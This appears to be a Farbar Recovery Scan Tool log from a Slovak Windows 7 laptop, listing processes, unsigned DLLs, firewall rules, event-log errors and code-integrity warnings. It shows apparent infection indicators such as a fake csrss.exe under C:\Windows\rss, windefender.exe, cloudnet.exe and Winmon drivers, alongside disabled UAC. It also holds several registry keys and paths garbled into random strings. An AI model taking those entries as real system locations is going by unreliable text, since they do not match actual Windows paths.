2011-09-16 15:04 - 2011-09-16 15:04 - 000093856 _____ (Atheros Communications Inc. -> Atheros Commnucations) [File not signed] C:\Program Files (x86)\Bluetooth Suite\L2capLib.dll
2011-09-16 15:06 - 2011-09-16 15:06 - 000310432 _____ (Atheros Communications Inc. -> Atheros Commnucations) [File not signed] C:\Program Files (x86)\Bluetooth Suite\ObjPush.dll
2011-09-16 15:06 - 2011-09-16 15:06 - 004974752 _____ (Atheros Communications Inc. -> Atheros Commnucations) [File not signed] C:\Program Files (x86)\Bluetooth Suite\OutLookLib.dll
2011-09-16 15:07 - 2011-09-16 15:07 - 000073888 _____ (Atheros Communications Inc. -> Atheros Commnucations) [File not signed] C:\Program Files (x86)\Bluetooth Suite\PhoneBook.DLL
2011-09-16 15:07 - 2011-09-16 15:07 - 000065184 _____ (Atheros Communications Inc. -> Atheros Commnucations) [File not signed] C:\Program Files (x86)\Bluetooth Suite\RfcommLib.dll
2011-09-16 15:08 - 2011-09-16 15:08 - 000109216 _____ (Atheros Communications Inc. -> Atheros Commnucations) [File not signed] C:\Program Files (x86)\Bluetooth Suite\sesmgr.dll
2011-09-16 15:08 - 2011-09-16 15:08 - 000284320 _____ (Atheros Communications Inc. -> Atheros Commnucations) [File not signed] C:\Program Files (x86)\Bluetooth Suite\ShellContextExt.dll
2011-09-16 15:08 - 2011-09-16 15:08 - 000041632 _____ (Atheros Communications Inc. -> Atheros Commnucations) [File not signed] C:\Program Files (x86)\Bluetooth Suite\sim.DLL
2011-09-16 15:08 - 2011-09-16 15:08 - 000129184 _____ (Atheros Communications Inc. -> Atheros Commnucations) [File not signed] C:\Program Files (x86)\Bluetooth Suite\skypeagent.dll
2011-09-16 15:09 - 2011-09-16 15:09 - 000061088 _____ (Atheros Communications Inc. -> Atheros Commnucations) [File not signed] C:\Program Files (x86)\Bluetooth Suite\Sync.dll
2011-09-16 15:09 - 2011-09-16 15:09 - 000030368 _____ (Atheros Communications Inc. -> Atheros Commnucations) [File not signed] C:\Program Files (x86)\Bluetooth Suite\utils.DLL
2018-02-15 20:11 - 2016-03-21 23:15 - 000027648 _____ (Copyright (c) Code Industry Ltd ) [File not signed] C:\Windows\System32\mpelocalmon.dll
2018-01-09 21:13 - 2016-10-04 15:51 - 000076800 _____ (Igor Pavlov) [File not signed] C:\Program Files\7-Zip\7-zip.dll
2018-01-11 15:12 - 2013-04-11 11:10 - 000073728 _____ (Intel Corporation) [File not signed] C:\Program Files (x86)\Intel\Intel(R) USB 3.0 eXtensible Host Controller Driver\Application\iusb3mon.dll
2019-04-02 17:10 - 2015-02-27 09:35 - 000489984 _____ (Newtonsoft) [File not signed] C:\Program Files (x86)\Wondershare\WAF\2.4.2.223\Newtonsoft.Json.dll
2017-02-12 01:28 - 2015-09-28 19:08 - 000255488 _____ (Sysprogs OU) [File not signed] C:\Program Files (x86)\WinCDEmu\x64\WinCDEmuContextMenu.dll
2019-10-21 13:56 - 2019-10-21 13:56 - 000355840 _____ (The cURL library, hxxp://curl.haxx.se/) [File not signed] C:\ProgramData\LgjH2m5c8emE66pjdExmgep47BAdKTrCJ7ent\laclient\LIBCURL.dll
2019-10-21 13:56 - 2019-10-21 13:56 - 002286747 _____ (The OpenSSL Project, hxxp://www.openssl.org/) [File not signed] C:\ProgramData\LgjH2m5c8emE66pjdExmgep47BAdKTrCJ7ent\laclient\LIBEAY32.dll
2019-10-21 13:56 - 2019-10-21 13:56 - 000416627 _____ (The OpenSSL Project, hxxp://www.openssl.org/) [File not signed] C:\ProgramData\LgjH2m5c8emE66pjdExmgep47BAdKTrCJ7ent\laclient\SSLEAY32.dll
2019-05-12 10:51 - 2019-05-12 10:51 - 005196800 _____ (University of Tsukuba) [File not signed] C:\Program Files\SoftEther VPN Client\VpnGatePlugin_x64.dll
2019-04-02 17:10 - 2017-03-20 15:13 - 000087552 _____ (Wondershare) [File not signed] C:\Program Files (x86)\Wondershare\WAF\2.4.2.223\WsAppCollect.dll
2019-04-02 17:10 - 2017-03-20 15:13 - 000197632 _____ (Wondershare) [File not signed] C:\Program Files (x86)\Wondershare\WAF\2.4.2.223\WsAppCommon.dll
==================== Alternate Data Streams (Whitelisted) ========
==================== Safe Mode (Whitelisted) ==================
(If an entry is included in the fixlist, it will be removed from the registry. The "AlternateShell" will be restored.)
HKLgjH2m5c8emE66pjdExmgep47BAdKTrsso2Vu8Ke6GEY5W51wwPPMqKZJowXQCea => ""="Service"
HKLgjH2m5c8emE66pjdExmgep47BAdKTrsso2Vu8Ke6GEY5W51wwPPMqKZJowXQCea => ""="Service"
==================== Association (Whitelisted) =================
==================== Internet Explorer trusted/restricted ==========
(If an entry is included in the fixlist, it will be removed from the registry.)
IE trusted site: HKU\S-1-5-21-1214245489-2610092731-2950206201-1000\...\localhost -> localhost
==================== Hosts content: =========================
(If needed Hosts: directive could be included in the fixlist to reset Hosts.)
2009-07-14 03:34 - 2020-01-22 20:05 - 000000027 _____ C:\Windows\system32\drivers\etc\hosts
127.0.0.1 localhost
==================== Other Areas ===========================
(Currently there is no automatic fix for this section.)
HKU\S-1-5-21-1214245489-2610092731-2950206201-1000\Control Panel\Desktop\\Wallpaper -> C:\Users\Jomko\GV9Jm2u7rmsCe65wKzPTw5jtS38n2tVEGizadie plochy.bmp
DNS Servers: 192.168.0.1
HKLgjH2m5c8emE66pjdExmgep47BAdKTrCJ7rmsCe65wKzPTw5jtS38n2tVEGi => (ConsentPromptBehaviorAdmin: 0) (ConsentPromptBehaviorUser: 3) (EnableLUA: 0)
Windows Firewall is enabled.
==================== MSCONFIG/TASK MANAGER disabled items ==
==================== FirewallRules (Whitelisted) ================
(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)
FirewallRules: [SPPSVC-In-TCP] => (Allow) %SystemRoot%\system32\sppsvc.exe No File
FirewallRules: [SPPSVC-In-TCP-NoScope] => (Allow) %SystemRoot%\system32\sppsvc.exe No File
FirewallRules: [{0D112C7C-66E1-4D54-AEB0-EE8E3A163F04}] => (Allow) C:\Program Files\Mozilla Firefox\firefox.exe (Mozilla Corporation -> Mozilla Corporation)
FirewallRules: [{E7E2670E-7962-4AFA-8A93-AD4B754A76A2}] => (Allow) C:\Program Files\Mozilla Firefox\firefox.exe (Mozilla Corporation -> Mozilla Corporation)
FirewallRules: [TCP Query User{C9127F07-56E6-49D5-A059-BE4717D6DCD0}C:\portable\utorrent-portable\utorrent.exe] => (Allow) C:\portable\utorrent-portable\utorrent.exe (uTorrent.CZ -> BitTorrent, Inc.) [File not signed]
FirewallRules: [UDP Query User{046EB926-BC54-4B7B-8553-B4B8557D4320}C:\portable\utorrent-portable\utorrent.exe] => (Allow) C:\portable\utorrent-portable\utorrent.exe (uTorrent.CZ -> BitTorrent, Inc.) [File not signed]
FirewallRules: [{33BE3F4B-2176-4BF9-8DAD-71F2993C7E22}] => (Allow) C:\Portable\utorrent-portable\utorrent.exe (uTorrent.CZ -> BitTorrent, Inc.) [File not signed]
FirewallRules: [{034F37EC-98CC-400F-A7F2-54D67FA53CE7}] => (Allow) C:\Portable\utorrent-portable\utorrent.exe (uTorrent.CZ -> BitTorrent, Inc.) [File not signed]
FirewallRules: [TCP Query User{72EA0069-1AE7-4F99-B211-021D3B204CC0}C:\program files\totalcmd\totalcmd64.exe] => (Allow) C:\program files\totalcmd\totalcmd64.exe (Ghisler Software GmbH -> Ghisler Software GmbH) [File not signed]
FirewallRules: [UDP Query User{7FF58BC0-AE02-48BE-B6F5-0B8F96943D04}C:\program files\totalcmd\totalcmd64.exe] => (Allow) C:\program files\totalcmd\totalcmd64.exe (Ghisler Software GmbH -> Ghisler Software GmbH) [File not signed]
FirewallRules: [{0957BBF0-D65F-4D9C-B51D-C765EA416DF7}] => (Allow) C:\Program Files\Intel\WiFi\bin\PanDhcpDns.exe (Intel(R) Wireless Connectivity Solutions -> )
FirewallRules: [TCP Query User{88E30C4A-334F-4EB7-935A-7BC2452751D3}C:\program files\filezilla ftp client\filezilla.exe] => (Allow) C:\program files\filezilla ftp client\filezilla.exe (Tim Kosse -> FileZilla Project)
FirewallRules: [UDP Query User{4C22E9E2-776E-4273-B65F-CB1E71B0E17B}C:\program files\filezilla ftp client\filezilla.exe] => (Allow) C:\program files\filezilla ftp client\filezilla.exe (Tim Kosse -> FileZilla Project)
FirewallRules: [TCP Query User{D5552FCB-7B8C-4A55-BCDA-866776675FD0}C:\program files\qtox\bin\qtox.exe] => (Allow) C:\program files\qtox\bin\qtox.exe () [File not signed]
FirewallRules: [UDP Query User{FDC9932A-896B-42DE-A1CE-0406F806B579}C:\program files\qtox\bin\qtox.exe] => (Allow) C:\program files\qtox\bin\qtox.exe () [File not signed]
FirewallRules: [{D75DA9A3-9755-4F80-98D4-2EF07ED17614}] => (Allow) C:\Program Files (x86)\Common Files\Apple\Apple Application Support\APSDaemon.exe (Apple Inc. -> Apple Inc.)
FirewallRules: [{6A3D486A-8B54-46A8-90CD-2B592EB9EBF6}] => (Allow) C:\Program Files\Bonjour\mDNSResponder.exe (Apple Inc. -> Apple Inc.)
FirewallRules: [{9050C82E-1247-429A-85DB-56FE67C39482}] => (Allow) C:\Program Files\Bonjour\mDNSResponder.exe (Apple Inc. -> Apple Inc.)
FirewallRules: [{3D1F2024-BC68-44C6-9035-211A5E556D48}] => (Allow) C:\Program Files (x86)\Bonjour\mDNSResponder.exe (Apple Inc. -> Apple Inc.)
FirewallRules: [{611DFF0B-0DAB-4871-9AD2-91E4F9D70647}] => (Allow) C:\Program Files (x86)\Bonjour\mDNSResponder.exe (Apple Inc. -> Apple Inc.)
FirewallRules: [TCP Query User{9747B657-A166-43E8-831D-33F204BC2790}C:\program files (x86)\wondershare\mobilego\mobilegoservice.exe] => (Allow) C:\program files (x86)\wondershare\mobilego\mobilegoservice.exe No File
FirewallRules: [UDP Query User{23B54518-BFAE-44C0-BD71-1342B40C49A7}C:\program files (x86)\wondershare\mobilego\mobilegoservice.exe] => (Allow) C:\program files (x86)\wondershare\mobilego\mobilegoservice.exe No File
FirewallRules: [{0FDF3415-E5D8-493C-96D4-75A240355D2B}] => (Allow) C:\Program Files\SoftEther VPN Client\vpnclient_x64.exe (SoftEther Corporation -> SoftEther VPN Project at University of Tsukuba, Japan.)
FirewallRules: [{DB7D1A44-D27A-4E0E-85C6-691CEDCD37BC}] => (Allow) C:\Program Files\SoftEther VPN Client\vpnclient.exe (SoftEther Corporation -> SoftEther VPN Project at University of Tsukuba, Japan.)
FirewallRules: [{95E4E855-A7CB-4193-AA0F-7B889EEF6193}] => (Allow) C:\Program Files\SoftEther VPN Client\vpncmgr.exe (SoftEther Corporation -> SoftEther VPN Project at University of Tsukuba, Japan.)
FirewallRules: [{F7955E18-9789-4EEB-9C13-711CCA694B6A}] => (Allow) C:\Program Files\SoftEther VPN Client\vpncmd.exe (SoftEther Corporation -> SoftEther VPN Project at University of Tsukuba, Japan.)
FirewallRules: [{99CE8752-A44F-4307-A1EE-4F54DEA2A760}] => (Allow) C:\Program Files\SoftEther VPN Client\vpncmgr_x64.exe (SoftEther Corporation -> SoftEther VPN Project at University of Tsukuba, Japan.)
FirewallRules: [{0ADB4278-50BC-4AFE-AAE9-EFE1BB2E4547}] => (Allow) C:\Program Files\SoftEther VPN Client\vpncmd_x64.exe (SoftEther Corporation -> SoftEther VPN Project at University of Tsukuba, Japan.)
FirewallRules: [{36E5F241-C08F-46E0-9466-1BC748A813DD}] => (Allow) C:\Users\Jomko\AppData\Local\Temp\7zS4058\HP.EasyStart.exe No File
FirewallRules: [{A79F7F72-CB8D-485D-B340-54C21C43C48B}] => (Allow) C:\Program Files\HP\HP LaserJet MFP M28-M31\bin\EWSProxy.exe (Hewlett Packard -> HP Inc.)
FirewallRules: [{2936F1E8-01AA-413E-BF0B-9B7345CD6630}] => (Allow) C:\Program Files\HP\HP LaserJet MFP M28-M31\bin\DigitalWizards.exe (Hewlett Packard -> HP Inc.)
FirewallRules: [{795728F4-FA31-4D9B-A4AB-78BB97087FA6}] => (Allow) C:\Program Files\HP\HP LaserJet MFP M28-M31\Bin\DeviceSetup.exe (Hewlett Packard -> HP Inc.)
FirewallRules: [{CC296BD8-C7AE-41FF-ADE9-3E0587CC9E2F}] => (Allow) LPort=5357
FirewallRules: [{35CA4271-53ED-4C97-986D-044960622E1F}] => (Allow) C:\Program Files\HP\HP LaserJet MFP M28-M31\Bin\HPNetworkCommunicatorCom.exe (Hewlett Packard -> HP Inc.)
FirewallRules: [{7AC26099-BE7F-4BFA-BEAF-FB184655BFC1}] => (Allow) C:\Program Files\iTunes\iTunes.exe (Apple Inc. -> Apple Inc.)
FirewallRules: [TCP Query User{65CCA3BC-5E01-4C02-8A65-D444D4094BDA}C:\program files (x86)\emule\emule.exe] => (Allow) C:\program files (x86)\emule\emule.exe No File
FirewallRules: [UDP Query User{5AA0508D-A7ED-409E-8567-CA6F25C48CC2}C:\program files (x86)\emule\emule.exe] => (Allow) C:\program files (x86)\emule\emule.exe No File
FirewallRules: [{F9AB2B23-2AC6-4DE0-A7FB-1DB375AED956}] => (Block) C:\program files (x86)\emule\emule.exe No File
FirewallRules: [{72A5A12A-716B-4CFA-BD0C-3A90C219130B}] => (Block) C:\program files (x86)\emule\emule.exe No File
FirewallRules: [TCP Query User{4218553C-8414-4FC1-AC03-AABE1168B85F}C:\program files\java\jre1.8.0_231\bin\javaw.exe] => (Allow) C:\program files\java\jre1.8.0_231\bin\javaw.exe No File
FirewallRules: [UDP Query User{B0D9DA1F-9B8B-4AB9-862B-90F0B455C8B4}C:\program files\java\jre1.8.0_231\bin\javaw.exe] => (Allow) C:\program files\java\jre1.8.0_231\bin\javaw.exe No File
FirewallRules: [{178817BF-A27F-4435-B34B-EEB2ECFB48E7}] => (Allow) C:\ProgramData\LgjH2m5c8emE66pjdExmgep47BAdKTrCJ7ent\LogiOptionsMgr.EXE (Logitech Inc -> Logitech, Inc.)
FirewallRules: [{63563E85-64C7-44E9-BB6F-8669228E4EF9}] => (Allow) C:\Program Files (x86)\VideoLAN\VLC\vlc.exe No File
FirewallRules: [{E5FB062C-8C90-4693-89F6-FB1FDBE0DE5B}] => (Allow) C:\Program Files (x86)\VideoLAN\VLC\vlc.exe No File
FirewallRules: [{E3904F86-8649-41ED-8BE1-960F80CE1B03}] => (Allow) C:\Program Files (x86)\VideoLAN\VLC\vlc.exe No File
FirewallRules: [{2D08EE70-88F2-4649-8299-B182B79733E6}] => (Allow) C:\Program Files (x86)\VideoLAN\VLC\vlc.exe No File
FirewallRules: [{8A4FB251-5506-42DA-AB5C-14C992BB4DFE}] => (Allow) C:\Users\Jomko\AppData\Roaming\EpicNet Inc\CloudNet\cloudnet.exe (EpicNet Inc.) [File not signed]
FirewallRules: [{9D9FB80D-2A4F-444D-B2C1-818FF186B9B7}] => (Allow) C:\Windows\rss\csrss.exe () [File not signed]
FirewallRules: [{ABD7F869-8C07-4289-8160-327C6CF23E5A}] => (Allow) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe (Google LLC -> Google LLC)
==================== Restore Points =========================
==================== Faulty Device Manager Devices ============
Name: Bluetooth Server
Description: Bluetooth Server
Class Guid: {34446e8e-37b4-4b16-9da6-bea2db33465a}
Manufacturer: Intel Corporation
Service: btmaux
Problem: : This device cannot start. (Code10)
Resolution: Device failed to start. Click "Update Driver" to update the drivers for this device.
On the "General Properties" tab of the device, click "Troubleshoot" to start the troubleshooting wizard.
Name: WinmonProcessMonitor
Description: WinmonProcessMonitor
Class Guid: {8ECC055D-047F-11D1-A537-0000F8753ED1}
Manufacturer:
Service: WinmonProcessMonitor
Problem: : This device is not present, is not working properly, or does not have all its drivers installed. (Code 24)
Resolution: The device is installed incorrectly. The problem could be a hardware failure, or a new driver might be needed.
Devices stay in this state if they have been prepared for removal.
After you remove the device, this error disappears.Remove the device, and this error should be resolved.
Name: Periférne zariadenie Bluetooth
Description: Periférne zariadenie Bluetooth
Class Guid:
Manufacturer:
Service:
Problem: : The drivers for this device are not installed. (Code 28)
Resolution: To install the drivers for this device, click "Update Driver", which starts the Hardware Update wizard.
Name: Periférne zariadenie Bluetooth
Description: Periférne zariadenie Bluetooth
Class Guid:
Manufacturer:
Service:
Problem: : The drivers for this device are not installed. (Code 28)
Resolution: To install the drivers for this device, click "Update Driver", which starts the Hardware Update wizard.
Name: Periférne zariadenie Bluetooth
Description: Periférne zariadenie Bluetooth
Class Guid:
Manufacturer:
Service:
Problem: : The drivers for this device are not installed. (Code 28)
Resolution: To install the drivers for this device, click "Update Driver", which starts the Hardware Update wizard.
Name: Periférne zariadenie Bluetooth
Description: Periférne zariadenie Bluetooth
Class Guid:
Manufacturer:
Service:
Problem: : The drivers for this device are not installed. (Code 28)
Resolution: To install the drivers for this device, click "Update Driver", which starts the Hardware Update wizard.
==================== Event log errors: ========================
Application errors:
==================
Error: (02/07/2020 08:51:17 PM) (Source: Microsoft-Windows-LoadPerf) (EventID: 3006) (User: NT AUTHORITY)
Description: Unable to read the performance counter strings defined for the 01B language ID. The first DWORD in the Data section contains the Win32 error code.
Error: (02/07/2020 08:51:17 PM) (Source: Microsoft-Windows-LoadPerf) (EventID: 3006) (User: NT AUTHORITY)
Description: Unable to read the performance counter strings defined for the 01B language ID. The first DWORD in the Data section contains the Win32 error code.
Error: (02/07/2020 08:51:17 PM) (Source: Microsoft-Windows-LoadPerf) (EventID: 3012) (User: NT AUTHORITY)
Description: The performance strings in the Performance registry value is corrupted when process Performance extension counter provider. The BaseIndex value from the Performance registry is the first DWORD in the Data section, LastCounter value is the second DWORD in the Data section, and LastHelp value is the third DWORD in the Data section.
Error: (02/07/2020 08:44:47 PM) (Source: WinMgmt) (EventID: 10) (User: )
Description: Event filter with query "SELECT * FROM __InstanceModificationEvent WITHIN 60 WHERE TargetInstance ISA "Win32_Processor" AND TargetInstance.LoadPercentage > 99" could not be reactivated in namespace "//./root/CIMV2" because of error 0x80041003. Events cannot be delivered through this filter until the problem is corrected.
Error: (02/07/2020 08:43:35 PM) (Source: Microsoft-Windows-LoadPerf) (EventID: 3006) (User: NT AUTHORITY)
Description: Unable to read the performance counter strings defined for the 01B language ID. The first DWORD in the Data section contains the Win32 error code.
Error: (02/07/2020 08:43:32 PM) (Source: Microsoft-Windows-LoadPerf) (EventID: 3006) (User: NT AUTHORITY)
Description: Unable to read the performance counter strings defined for the 01B language ID. The first DWORD in the Data section contains the Win32 error code.
Error: (02/07/2020 08:43:32 PM) (Source: Microsoft-Windows-LoadPerf) (EventID: 3012) (User: NT AUTHORITY)
Description: The performance strings in the Performance registry value is corrupted when process Performance extension counter provider. The BaseIndex value from the Performance registry is the first DWORD in the Data section, LastCounter value is the second DWORD in the Data section, and LastHelp value is the third DWORD in the Data section.
Error: (02/07/2020 08:39:15 PM) (Source: WinMgmt) (EventID: 10) (User: )
Description: Event filter with query "SELECT * FROM __InstanceModificationEvent WITHIN 60 WHERE TargetInstance ISA "Win32_Processor" AND TargetInstance.LoadPercentage > 99" could not be reactivated in namespace "//./root/CIMV2" because of error 0x80041003. Events cannot be delivered through this filter until the problem is corrected.
System errors:
=============
Error: (02/07/2020 08:57:43 PM) (Source: Schannel) (EventID: 4119) (User: NT AUTHORITY)
Description: The following fatal alert was received: 70.
Error: (02/07/2020 08:57:42 PM) (Source: Schannel) (EventID: 4119) (User: NT AUTHORITY)
Description: The following fatal alert was received: 70.
Error: (02/07/2020 08:44:52 PM) (Source: Service Control Manager) (EventID: 7026) (User: )
Description: Nasledujúce ovládače pre spustenie zavedenia alebo spustenie systému zlyhali pri načítaní:
cdrom
Error: (02/07/2020 08:43:39 PM) (Source: Service Control Manager) (EventID: 7000) (User: )
Description: Spustenie služby Windows Media Player - služba zdieľania v sieti zlyhalo kvôli nasledujúcej chybe:
Pretože zlyhalo prihlásenie, službu sa nepodarilo spustiť.
Error: (02/07/2020 08:43:39 PM) (Source: Service Control Manager) (EventID: 7038) (User: )
Description: Službe WMPNetworkSvc sa nepodarilo s aktuálne nakonfigurovaným heslom prihlásiť ako NT AUTHORITY\NetworkService kvôli nasledujúcej chybe:
Požiadavka nie je podporovaná.
Ak chcete zabezpečiť správne nakonfigurovanie služby, použite modul Služby konzoly MMC (Microsoft Management Console).
Error: (02/07/2020 08:43:27 PM) (Source: Microsoft-Windows-WLAN-AutoConfig) (EventID: 10003) (User: NT AUTHORITY)
Description: Modul WLAN Extensibility Module sa neočakávane zastavil.
Cesta k modulu: C:\Windows\System32\IWMSSvc.dll
Error: (02/07/2020 08:43:27 PM) (Source: Microsoft-Windows-WLAN-AutoConfig) (EventID: 10003) (User: NT AUTHORITY)
Description: Modul WLAN Extensibility Module sa neočakávane zastavil.
Cesta k modulu: C:\Windows\System32\IWMSSvc.dll
Error: (02/07/2020 08:43:27 PM) (Source: Microsoft-Windows-WLAN-AutoConfig) (EventID: 10003) (User: NT AUTHORITY)
Description: Modul WLAN Extensibility Module sa neočakávane zastavil.
Cesta k modulu: C:\Windows\System32\IWMSSvc.dll
Windows Defender:
===================================
Date: 2019-09-17 22:50:36.541
Description:
Windows Defender scan has been stopped before completion.
Scan ID:{D3AB2F47-DE50-48D7-A60C-9877224729C3}
Scan Type:AntiSpyware
Scan Parameters:Quick Scan
Date: 2018-07-04 22:05:48.863
Description:
Windows Defender has encountered an error trying to update signatures.
New Signature Version:1.271.442.0
Previous Signature Version:1.269.1075.0
Update Source:User
Signature Type:AntiSpyware
Update Type:Delta
Current Engine Version:1.1.15000.2
Previous Engine Version:1.1.14901.4
Error code:0x80070666
Error description:Už je nainštalovaná iná verzia produktu. Inštaláciu tejto verzie nemožno dokončiť. Ak chcete existujúcu verziu produktu nakonfigurovať alebo odstrániť, použite ovládací panel Pridať alebo odstrániť programy.
Date: 2018-07-04 22:05:48.863
Description:
Windows Defender has encountered an error trying to update the engine.
New Engine Version:1.1.15000.2
Previous Engine Version:1.1.14901.4
Update Source:User
Error Code:0x80070666
Error description:Už je nainštalovaná iná verzia produktu. Inštaláciu tejto verzie nemožno dokončiť. Ak chcete existujúcu verziu produktu nakonfigurovať alebo odstrániť, použite ovládací panel Pridať alebo odstrániť programy.
CodeIntegrity:
===================================
Date: 2020-02-07 20:39:10.913
Description:
Windows is unable to verify the image integrity of the file \Device\HarddiskVolume2\Windows\System32\drivers\WinmonProcessMonitor.sys because file hash could not be found on the system. A recent hardware or software change might have installed a file that is signed incorrectly or damaged, or that might be malicious software from an unknown source.
Date: 2020-02-07 20:39:10.897
Description:
Windows is unable to verify the image integrity of the file \Device\HarddiskVolume2\Windows\System32\drivers\WinmonProcessMonitor.sys because file hash could not be found on the system. A recent hardware or software change might have installed a file that is signed incorrectly or damaged, or that might be malicious software from an unknown source.
Date: 2020-02-06 20:58:11.850
Description:
Windows is unable to verify the image integrity of the file \Device\HarddiskVolume2\Windows\System32\drivers\WinmonProcessMonitor.sys because file hash could not be found on the system. A recent hardware or software change might have installed a file that is signed incorrectly or damaged, or that might be malicious software from an unknown source.
Date: 2020-02-06 20:58:11.835
Description:
Windows is unable to verify the image integrity of the file \Device\HarddiskVolume2\Windows\System32\drivers\WinmonProcessMonitor.sys because file hash could not be found on the system. A recent hardware or software change might have installed a file that is signed incorrectly or damaged, or that might be malicious software from an unknown source.
Date: 2020-01-26 22:55:16.111
Description:
Windows is unable to verify the image integrity of the file \Device\HarddiskVolume2\Windows\System32\drivers\Winmon.sys because file hash could not be found on the system. A recent hardware or software change might have installed a file that is signed incorrectly or damaged, or that might be malicious software from an unknown source.
Date: 2020-01-26 22:55:16.096
Description:
Windows is unable to verify the image integrity of the file \Device\HarddiskVolume2\Windows\System32\drivers\Winmon.sys because file hash could not be found on the system. A recent hardware or software change might have installed a file that is signed incorrectly or damaged, or that might be malicious software from an unknown source.
Date: 2020-01-26 22:55:01.178
Description:
Windows is unable to verify the image integrity of the file \Device\HarddiskVolume2\Windows\System32\drivers\WinmonProcessMonitor.sys because file hash could not be found on the system. A recent hardware or software change might have installed a file that is signed incorrectly or damaged, or that might be malicious software from an unknown source.
Date: 2020-01-26 22:55:01.147
Description:
Windows is unable to verify the image integrity of the file \Device\HarddiskVolume2\Windows\System32\drivers\WinmonProcessMonitor.sys because file hash could not be found on the system. A recent hardware or software change might have installed a file that is signed incorrectly or damaged, or that might be malicious software from an unknown source.
==================== Memory info ===========================
BIOS: TOSHIBA 1.90 09/19/2014
Motherboard: TOSHIBA VG10S
Processor: Intel(R) Core(TM) i7-4700MQ CPU @ 2.40GHz
Percentage of memory in use: 38%
Total physical RAM: 8103.89 MB
Available physical RAM: 5005.23 MB
Total Virtual: 22102.04 MB
Available Virtual: 17834.01 MB
==================== Drives ================================
Drive c: (Windows 7) (Fixed) (Total:143.37 GB) (Free:13.22 GB) NTFS
Drive d: (Windows 10) (Fixed) (Total:94.4 GB) (Free:12.33 GB) NTFS
Drive e: (data) (Fixed) (Total:465.76 GB) (Free:24.75 GB) NTFS
\\?\Volume{fddfa42c-f3c0-11e7-944c-806e6f6e6963}\ (Vyhradené systémom) (Fixed) (Total:0.1 GB) (Free:0.07 GB) NTFS
\\?\Volume{ff0173d9-491a-11ea-9cd7-806e6f6e6963}\ () (Fixed) (Total:0.61 GB) (Free:0.08 GB) NTFS
==================== MBR & Partition Table ====================
==========================================================
Disk: 0 (MBR Code: Windows 7/8/10) (Size: 238.5 GB) (Disk ID: C14F8450)
Partition 1: (Active) - (Size=100 MB) - (Type=07 NTFS)
Partition 2: (Not Active) - (Size=143.4 GB) - (Type=07 NTFS)
Partition 3: (Not Active) - (Size=94.4 GB) - (Type=07 NTFS)
Partition 4: (Not Active) - (Size=622 MB) - (Type=27)
==========================================================
Disk: 1 (MBR Code: Windows 7/8/10) (Size: 465.8 GB) (Disk ID: 3C2BC5FC)
Partition 1: (Not Active) - (Size=465.8 GB) - (Type=07 NTFS)
==================== End of Addition.txt =======================
Ran by Jomko (administrator) on JOMKO_WIN7 (TOSHIBA SATELLITE P50-A-13C) (07-02-2020 20:55:17)
Running from C:\Users\Jomko\Desktop
Loaded Profiles: Jomko (Available Profiles: Jomko)
Platform: Windows 7 Professional Service Pack 1 (X64) Language: Slovenčina (Slovensko)
Internet Explorer Version 11 (Default browser: FF)
Boot Mode: Normal
Tutorial for Farbar Recovery Scan Tool: http://www.geekstogo.com/forum/topic/33 ... scan-tool/
==================== Processes (Whitelisted) =================
(If an entry is included in the fixlist, the process will be closed. The file will not be moved.)
() [File not signed] C:\Windows\rss\csrss.exe
(Access Denied) [File not signed] C:\Windows\windefender.exe
(ActMask Group Co., Ltd -> ActMask Co.,Ltd - hxxp://WWW.ALL2PDF.COM) C:\Windows\System32\PrintCtrl.exe
(ActMask Group Co., Ltd -> ActMask Co.,Ltd - hxxp://www.all2pdf.com) C:\Windows\System32\PrintDisp.exe
(ActMask Group Co., Ltd -> ActMask Co.,Ltd - hxxp://www.all2pdf.com) C:\Windows\System32\PrintDisp.exe
(Adobe Inc. -> Adobe Systems) C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
(Apple Inc. -> Apple Inc.) C:\Program Files\Bonjour\mDNSResponder.exe
(Apple Inc. -> Apple Inc.) C:\Program Files\Common Files\Apple\Mobile Device Support\AppleMobileDeviceService.exe
(Apple Inc. -> Apple Inc.) C:\Program Files\iPod\bin\iPodService.exe
(Apple Inc. -> Apple Inc.) C:\Program Files\iTunes\iTunesHelper.exe
(Atheros Communications Inc. -> Atheros Commnucations) [File not signed] C:\Program Files (x86)\Bluetooth Suite\AdminService.exe
(Atheros Communications Inc. -> Atheros Commnucations) [File not signed] C:\Program Files (x86)\Bluetooth Suite\AthBtTray.exe
(Atheros Communications Inc. -> Atheros Communications) [File not signed] C:\Program Files (x86)\Bluetooth Suite\BtvStack.exe
(EpicNet Inc.) [File not signed] C:\Users\Jomko\AppData\Local\Temp\csrss\cloudnet.exe
(Google Inc -> Google Inc.) C:\Program Files (x86)\Google\Update\GoogleUpdate.exe
(IDT, Inc.) [File not signed] C:\Program Files\IDT\WDM\stacsv64.exe
(Intel Corporation - Software and Firmware Products -> Intel Corporation) C:\Program Files (x86)\Intel\Intel(R) USB 3.0 eXtensible Host Controller Driver\Application\iusb3mon.exe
(Intel Corporation -> ) C:\Windows\System32\igfxTray.exe
(Intel Corporation -> Intel Corporation) C:\Windows\System32\igfxCUIService.exe
(Intel Corporation -> Intel Corporation) C:\Windows\System32\igfxEM.exe
(Intel Corporation -> Intel Corporation) C:\Windows\System32\igfxHK.exe
(Intel Corporation-Wireless Connectivity Solutions -> Intel Corporation) C:\Windows\System32\ibtsiva.exe
(Intel(R) Wireless Connectivity Solutions -> Intel(R) Corporation) C:\Program Files\Common Files\Intel\WirelessCommon\RegSrvc.exe
(Intel(R) Wireless Connectivity Solutions -> Intel(R) Corporation) C:\Program Files\Intel\WiFi\bin\EvtEng.exe
(Intel(R) Wireless Connectivity Solutions -> Intel® Corporation) C:\Program Files\Intel\WiFi\bin\ZeroConfigService.exe
(Intel(R) Wireless Connectivity Solutions -> Motorola Solutions, Inc.) C:\Program Files (x86)\Intel\Bluetooth\devmonsrv.exe
(Intel(R) Wireless Connectivity Solutions -> Motorola Solutions, Inc.) C:\Program Files (x86)\Intel\Bluetooth\mediasrv.exe
(Intel(R) Wireless Connectivity Solutions -> Motorola Solutions, Inc.) C:\Program Files (x86)\Intel\Bluetooth\obexsrv.exe
(Logitech Inc -> Logitech) C:\ProgramData\LgjH2m5c8emE66pjdExmgep47BAdKTrCJ7ent\LogiOverlay.exe
(Logitech Inc -> Logitech, Inc.) C:\Program Files\Logitech\LogiOptions\LogiOptions.exe
(Logitech Inc -> Logitech, Inc.) C:\ProgramData\LgjH2m5c8emE66pjdExmgep47BAdKTrCJ7ent\laclient\laclient.exe
